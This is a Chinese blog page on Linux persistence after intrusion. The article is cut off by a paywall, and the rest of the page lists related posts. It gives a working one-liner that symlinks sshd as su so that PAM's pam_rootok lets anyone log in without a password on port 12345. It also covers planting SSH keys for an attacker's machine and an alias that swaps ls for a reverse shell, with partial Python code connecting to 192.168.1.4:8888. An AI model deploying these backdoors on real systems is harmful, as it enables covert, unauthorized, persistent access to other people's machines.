Linux权限维持

最新推荐文章于 2024-09-09 12:19:38 发布
最新推荐文章于 2024-09-09 12:19:38 发布
阅读量611 收藏 9
点赞数 19
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SOSKUN/article/details/139769510
sshd软连接后门

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

在/usr/loacl目录下创建一个su软连接指向sshd,再临时配置此sshd监听的端口为12345,当开启了PAM验证机制的时候,PAM模块则会搜寻PAM相关设定文件,设定文件一般是在/etc/pam.d/,对应pam文件名即为软连接文件名,当我们建立名为su的软连接,即使用了su的pam配置文件,而su的配置文件中有这样一句话 auth sufficient pam_rootok.so,对uid为0的root用户无条件通过认证。当我们指定端口为12345时,及使用了su的pam的配置文件,无条件通过认证。

免密公钥

ssh-keygen -t rsa

第一次键入保存公私钥的路径,在输入密码时连续两次键入回车即可实现免密的密钥对,将公钥放在对应用户家目录的.ssh,目录下重命名为authorized_keys,将私钥设置为700权限,即可在攻击机上用-i指定私钥从而实现免密登录

alias后门

alias [别名] "[表达式]"

将ls命令替换为反弹shell

  1. alias 不支持参数传递,只有函数才支持参数传递,所以需要用函数将ls的参数传递,否则受害者执行带参数的ls会报错

  2. 传统的反弹shell反弹后终端就无响应了,很容易被发现,所以使用python脚本

    import os,socket,subprocess;
ret = os.fork()
if ret > 0:
    exit()
else:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("192.168.1.4", 8888))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno
最低0.47元/天 解锁文章

200万优质内容无限畅学
D31imiter
关注
内网渗透-linux权限维持
lza20001103的博客
08-25 1740
内网渗透-linux权限维持 文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
第144天:内网安全-Linux权限维持&OpenSSH&PAM后门&SSH软链接&公私钥登录
最新发布
weixin_71529930的博客
09-09 1300
案例一: 权限维持-Linux-替换版本-OpenSSH 后门原理:替换本身操作系统的 ssh 协议支撑软件 openssh,重新安装自定义的 openssh,达到记录帐号密码,也可以采用万能密码连接的功能!查看当前ssh的版本 ssh -V环境准备安装依赖下载替换版本和后门文件解压文件安装openssh也就是把这个文件,复制成外面这个文件并覆盖,所以之前下载的那个应该没啥用哈^_^修改配置万能密码修改版本,version.h文件修改与之前版本一致。
Linux】文件系统中inode与软硬链接以及读写权限问题
m0_74774759的博客
11-16 2044
文件=文件内容+文件属性Linux中文件内容与属性是分开存储的。文件内容:在数据块中存着文件属性:在inode中存着Block Group:ext2文件系统会根据分区的大小划分为数个Block Group。而每个Block Group都有着相同的结构组成。政府管理各区的例子超级块(Super Block):存放文件系统本身的结构信息。
Linux软链接与硬链接
mrqiuwen的博客
07-10 3894
介绍了Linux系统下软链接和硬链接的功能和基本概念,从原理上剖析了二者的区别
Linux学习03-软连接硬链接以及修改文件权限
azto的博客
02-19 4043
Linux软连接 和 硬连接 硬链接 使用ls -l可以查看文件的详细信息,当是l打头的则表示这个是一个链接文件 创建的硬链接不占用磁盘空间并且硬链接数+1 只有文件才能创建硬链接,目录是不能创建硬链接的 当修改其中一个的内容的时候其他两个也会相对应的修改,如果删除其中一个 硬链接数会减少1 软链接 软链接相当于快捷键,即使被删除也不会有什么影响。 软链接的创建需要一个绝对路径 文件和目录属...
linux_链接,查找,权限,重定向,打包,正则表达式
weixin_63494444的博客
11-11 868
一个点表示当前工作目录,两个点表示上一层工作目录;目录的本质:文件(该文件储存目录项,以链表的形式链接,每个结点都是目录项,创建文件相当于把目录项添加到链表中)如果想在一个目录中添加或者删除目录项,需要获取这个目录的写权限;软连接:符号链接,单独的文件里面存储了文件路径,类似于指针,指向目录;硬链接:文件以链表形式存于物理文件系统,虚拟文件系统(VFS)与物理文件系统存在一种映射,上图he目录和点目录指向同一个文件,这种映射情形叫硬链接;
linux权限维持.pdf
03-31
Linux权限维持是信息安全领域内一个关键的话题,特别是在对Linux系统进行入侵测试或实际遭受攻击后,保持对系统的访问权限是一个常见需求。以下是关于Linux权限维持的详细介绍: 首先,Linux系统权限维持的方法通常...
Linux 权限维持
weixin_44268185的博客
08-21 214
【代码】Linux 权限维持
软连接&硬链接详解
[byte轻骑兵] 的技术小窝!
09-09 7204
软连接&硬链接从定义、特定和使用等方敏进行详解
Linux 软连接权限问题
weixin_37868901的博客
02-18 6276
linux的链接有两种方式,Hard link 和 Symbolic Link。 首先 linux要打开一个文件: 该文件的inode ----> block(是一个inode目录)----> inode ---->读取文件内容 然后 二者都要在建立连接的目录下建一个文件,占用当前目录的inode条目。 Hl的inode条目直接指向存储的block,等于开了另一个门。 而Sl的...
linux---操作命令/文件与目录的权限/软连接/
python_web全栈
03-24 5059
1.常用命令 1 tree /home/ 树状形式显示 yum install tree 2 cat :查看文本内容 cat >> test2.txt <<EOF > ads > adf > EOF 3 less,more:文本查看,分页 less /etc/services 4 head -n1 /etc/services :查看该文件第一行 5 ps aux | head -n5 :查看前5个进程 6 tail -f /.
软链接和修改目录的写权限
walle的博客
09-01 8806
有一个uploads目录,还有一个sub/uploads目录,后一个要软链接到前一个
linux 文件系统的权限问题和涉及到的软硬链接
iteye_11584的博客
03-21 236
任何设备在linux下都是文件。 文件即包括windows下的文件又包括windows下的目录,还包括windows下的设备。 一、文件权限的意义 r:可以读这个文件的具体内容; w:可以编辑这个文件的内容,包括增加删除文件的具体内容 但不包括删除该文件; x:文件就具有了可执行的权限-------注意:这里和window不一样,在win中,文件的可执行权限是通过扩展名表现出来的...
软连接和硬链接,用户和组,权限
weixin_44675370的博客
04-17 1848
硬链接相当于复制了一份。即使删除源文件,链接文件仍然完整打开。格式是:ln 源文件路径 链接名 软连接类似于windows下的快捷方式,格式是: ln -s源文件路径 链接名 源文件路径 应该使用绝对路径,如果使用相对路径,当快捷键文件移动目录,快捷键失效。 ***************************************************************...
linux 添加软连接、查看软连接、增加文件的执行权限
qq_41221841的博客
09-18 2万+
ln -s 原文件绝对路径 软连接地址 #查看软连接 ls -al
Linux链接命令-ln
刘伟佳的博客
04-06 3万+
链接命令ln,并且介绍了软链接和硬链接的特点和区别。
chown -R 改不了软链接指向的文件权限
Caso_卡索的博客
11-28 7324
关于chown命令,chown 命令能不能修改一个软链接文件的权限呢?
linux创建软链接命令-ln -s
热门推荐
老徐的博客只有干货
05-29 4万+
linux 创建连接命令 ln -s 软链接 这是linux中一个非常重要命令,请大家一定要熟悉。它的功能是为某一个文件在另外一个位置建立一个同不的链接,这个命令最常用的参数是-s, 具体用法是:ln -s 源文件 目标文件。 当 我们需要在不同的目录,用到相同的文件时,我们不需要在每一个需要的目录下都放一个必须相同的文件,我们只要在某个固定的目录,放上该文件,然后在其它的 目录下用ln命令
Linux硬连接和软连接详解
超人不会飞
11-16 6949
Lnux也有类似于windows下的快捷方式,这种快捷方式在linux下称作硬连接(hard link)和软连接(symbolic link,又称作符号链接)。创建链接文件 创建linkfile.txt文件[root@localhost tmp]# touch linkfile.txt [root@localhost tmp]# echo 'testlink' > linkfile.txt 创建硬
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值